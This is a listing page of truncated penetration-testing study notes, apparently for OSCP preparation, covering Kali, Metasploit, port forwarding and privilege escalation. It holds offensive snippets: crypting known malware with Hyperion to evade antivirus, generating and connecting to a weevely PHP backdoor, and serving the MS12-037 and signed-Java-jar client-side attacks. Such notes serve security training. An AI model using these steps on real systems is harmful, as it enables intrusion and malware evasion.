Latest notes for PenTesting - MrLeet

MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

There are many pages on the web documenting quick reverse shell one-liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them, but I wanted to recapture what they’ve got for my notes purposes. (It’s easier for me to find stuff if it’s in one place.) All credit goes to both of those guys where I got all t...

Score: 0

By: unknowndevice64 2019-05-18 12:26:48

Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
The Domain
Offensive Security Labs

Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting

The Essential Tools

Score: 0

Crypting Known Malware with Software Protectors

One such open source crypter, called Hyperion

cp /usr/share/windows-binaries/
cd Hyperion-1.0/
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...

Score: 0

See Metasploit Unleashed Course in the Essentials

Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.


Metasploit requires PostgreSQL

systemctl start postgresql

To enabl...

Score: 1

Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port

apt-get install rinetd

cat /etc/rinetd.conf

# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80

SSH Local Port Forwarding: supports bi-directional communicatio...

Score: 0

AES Decryption

Convert multiple webpages into a word list

# Fetch each page, convert the HTML to text, and write one word per line
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; \
done

Or convert html to word ...

Score: 0

Webshag Web Application Vulnerability Assessment Platform

Web Shells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t


Score: 0

Client Attacks

MS12-037 - Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells

Score: 0

Metasploit Meterpreter Privilege Escalation Guide

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:


net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.


Score: 0

Defacto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration:
Try the obvious - Maybe the user is root or can sudo to root:
sudo su

Here are the commands I have learned to use to perform Linux enumeration and privilege escal...

Score: 0